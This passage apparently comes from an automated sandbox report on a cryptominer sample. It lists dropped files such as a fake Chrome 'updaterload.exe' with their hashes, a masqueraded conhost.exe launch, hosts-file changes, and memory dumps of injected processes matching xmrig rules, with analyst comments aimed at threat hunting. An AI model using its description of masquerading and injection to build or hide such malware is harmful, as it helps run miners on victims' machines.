- conhost.exe started with a bare word as its argument (czjocpdzix, or wbddxxhtzvvizkaa followed by a long base64-looking blob) is not how Windows starts a console host; a genuine instance is the last entry above (\??\ path with a quoted numeric argument). The blob is not decoded on this page.
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Google\Chrome\updaterload.exe
  Filesize: 4.0MB
  MD5: 0d3ed509cef23128823470fbcdbdf3d9
  SHA1: 71adac1753da0c55082417fd59f48c65804d9f45
  SHA256: 2eb898b1ca572c76fe7b085853c14da13879eceeba5918a222e2832c182c50d6
  SHA512: 6b994c3a65c251dd1fe403be09103fc86e8573a6c4ea78c4d76ec7346acd311c89ef5f1ddd85e07ed127ba21975b2202a64349aa7daeb27a307b522b2025bd2c
  Same size as their.exe but different hashes, so the dropped file is not a byte-identical copy of the sample; hunt on both sets of hashes.
- C:\Program Files\Google\Libs\g.log
  Filesize: 198B
  MD5: 37dd19b2be4fa7635ad6a2f3238c4af1
  SHA1: e5b2c034636b434faee84e82e3bce3a3d3561943
  SHA256: 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
  SHA512: 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
  Redirected output of "wmic PATH Win32_VideoController GET Name, VideoProcessor" (the GPU inventory), so its hash varies with the host's graphics adapter.
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 944191fd37c68fb316425b31da1a2ec8
  SHA1: 719819e496b1b6ab2ee5cf1c6f09ee1acdd1105d
  SHA256: 77634c73365e05bf4428d26a4942c37a16daca6460a3436d7e8f8a14f0fefb2c
  SHA512: 4ccb7ebe4d8133b7d8fa7b8bbda90217ce2a482ee272373534ce43bc8cf84223fcc4f1fd90c7457e50ab51e9a5b31cc816f96eb463d0972daa20cb5552d518bd
  Windows jump-list file; no command line in the tree references it.
- C:\Windows\system32\drivers\etc\hosts
  Filesize: 2KB
  MD5: 42188cf3639d7b443892f641a7c3acbb
  SHA1: 1e6df6826c91689e48b902d86c2f6fe017eead2b
  SHA256: 8d295041f208c8c0f1b50dd018fa9fe0ba4c4f9c1fd12e1c1e041389c62e6082
  SHA512: 4def2cd61796b1ecd0db19135c37010366766bda7396a47622c8150b44be3e9e47805b37d760e6dccb0ce2de8143f0b5457ff4c02e857017a45a1782bfc1da12
- \??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These are the hashes of zero-length input: the sandbox captured the pipe handle, not any data.
- \Program Files\Google\Chrome\updaterload.exe
  Filesize: 4.0MB
  MD5: 0d3ed509cef23128823470fbcdbdf3d9
  SHA1: 71adac1753da0c55082417fd59f48c65804d9f45
  SHA256: 2eb898b1ca572c76fe7b085853c14da13879eceeba5918a222e2832c182c50d6
  SHA512: 6b994c3a65c251dd1fe403be09103fc86e8573a6c4ea78c4d76ec7346acd311c89ef5f1ddd85e07ed127ba21975b2202a64349aa7daeb27a307b522b2025bd2c
-
Memory dumps (PID-index-range). Only PIDs 1212 and 1280, the two SetThreadContext targets, have a mapping entry at a non-zero address; the two 8.0MB dumps of PID 1212 at 0x140000000 are the regions matching the xmrig and upx rules.
- memory/288-111-0x0000000000000000-mapping.dmp
- memory/320-112-0x0000000000000000-mapping.dmp
- memory/320-69-0x0000000000000000-mapping.dmp
- memory/524-83-0x0000000000000000-mapping.dmp
- memory/564-94-0x0000000000000000-mapping.dmp
- memory/584-67-0x0000000000000000-mapping.dmp
- memory/680-117-0x0000000000000000-mapping.dmp
- memory/808-91-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp (10.1MB)
- memory/808-96-0x0000000002A1B000-0x0000000002A3A000-memory.dmp (124KB)
- memory/808-92-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp (11.4MB)
- memory/808-88-0x0000000000000000-mapping.dmp
- memory/808-95-0x0000000002A14000-0x0000000002A17000-memory.dmp (12KB)
- memory/816-85-0x0000000000000000-mapping.dmp
- memory/816-121-0x0000000000000000-mapping.dmp
- memory/840-127-0x0000000000000000-mapping.dmp
- memory/852-75-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmp (11.4MB)
- memory/852-80-0x000000001B780000-0x000000001BA7F000-memory.dmp (3.0MB)
- memory/852-84-0x000000000294B000-0x000000000296A000-memory.dmp (124KB)
- memory/852-82-0x0000000002944000-0x0000000002947000-memory.dmp (12KB)
- memory/852-73-0x000007FEF3F50000-0x000007FEF4973000-memory.dmp (10.1MB)
- memory/852-64-0x0000000000000000-mapping.dmp
- memory/852-87-0x000000000294B000-0x000000000296A000-memory.dmp (124KB)
- memory/868-72-0x0000000000000000-mapping.dmp
- memory/912-71-0x0000000000000000-mapping.dmp
- memory/920-126-0x0000000000000000-mapping.dmp
- memory/960-107-0x0000000000000000-mapping.dmp
- memory/988-115-0x0000000000000000-mapping.dmp
- memory/1068-63-0x0000000000000000-mapping.dmp
- memory/1132-86-0x0000000000000000-mapping.dmp
- memory/1184-114-0x0000000000000000-mapping.dmp
- memory/1208-74-0x0000000000000000-mapping.dmp
- memory/1212-139-0x00000000001E0000-0x0000000000200000-memory.dmp (128KB)
- memory/1212-138-0x0000000140000000-0x00000001407F4000-memory.dmp (8.0MB)
- memory/1212-140-0x0000000000400000-0x0000000000420000-memory.dmp (128KB)
- memory/1212-141-0x0000000000400000-0x0000000000420000-memory.dmp (128KB)
- memory/1212-142-0x0000000140000000-0x00000001407F4000-memory.dmp (8.0MB)
- memory/1212-143-0x0000000000400000-0x0000000000420000-memory.dmp (128KB)
- memory/1212-137-0x00000001407F25D0-mapping.dmp
- memory/1212-144-0x0000000000400000-0x0000000000420000-memory.dmp (128KB)
- memory/1220-77-0x0000000000000000-mapping.dmp
- memory/1280-132-0x00000001400014E0-mapping.dmp
- memory/1288-66-0x0000000000000000-mapping.dmp
- memory/1328-62-0x0000000000000000-mapping.dmp
- memory/1368-100-0x0000000000000000-mapping.dmp
- memory/1368-103-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmp (11.4MB)
- memory/1368-106-0x000000000110B000-0x000000000112A000-memory.dmp (124KB)
- memory/1368-104-0x0000000001104000-0x0000000001107000-memory.dmp (12KB)
- memory/1368-105-0x000000000110B000-0x000000000112A000-memory.dmp (124KB)
- memory/1368-102-0x000007FEF3F50000-0x000007FEF4973000-memory.dmp (10.1MB)
- memory/1404-110-0x0000000000000000-mapping.dmp
- memory/1528-124-0x0000000000000000-mapping.dmp
- memory/1592-135-0x0000000000000000-mapping.dmp
- memory/1628-76-0x0000000000000000-mapping.dmp
- memory/1628-122-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp (11.4MB)
- memory/1628-116-0x0000000000000000-mapping.dmp
- memory/1628-120-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp (10.1MB)
- memory/1628-131-0x00000000012EB000-0x000000000130A000-memory.dmp (124KB)
- memory/1628-130-0x00000000012E4000-0x00000000012E7000-memory.dmp (12KB)
- memory/1668-78-0x0000000000000000-mapping.dmp
- memory/1704-128-0x0000000000000000-mapping.dmp
- memory/1712-98-0x0000000000000000-mapping.dmp
- memory/1736-134-0x0000000000000000-mapping.dmp
- memory/1740-79-0x0000000000000000-mapping.dmp
- memory/1764-108-0x0000000000000000-mapping.dmp
- memory/1768-81-0x0000000000000000-mapping.dmp
- memory/1824-125-0x0000000000000000-mapping.dmp
- memory/1928-123-0x0000000000000000-mapping.dmp
- memory/1980-113-0x0000000000000000-mapping.dmp
- memory/2004-54-0x0000000000000000-mapping.dmp
- memory/2004-129-0x0000000000000000-mapping.dmp
- memory/2004-60-0x0000000002884000-0x0000000002887000-memory.dmp (12KB)
- memory/2004-61-0x000000000288B000-0x00000000028AA000-memory.dmp (124KB)
- memory/2004-58-0x000000001B6F0000-0x000000001B9EF000-memory.dmp (3.0MB)
- memory/2004-59-0x0000000002884000-0x0000000002887000-memory.dmp (12KB)
- memory/2004-57-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp (11.4MB)
- memory/2004-56-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp (10.1MB)
- memory/2004-55-0x000007FEFB931000-0x000007FEFB933000-memory.dmp (8KB)
- memory/2020-65-0x0000000000000000-mapping.dmp
- memory/2024-133-0x0000000000000000-mapping.dmp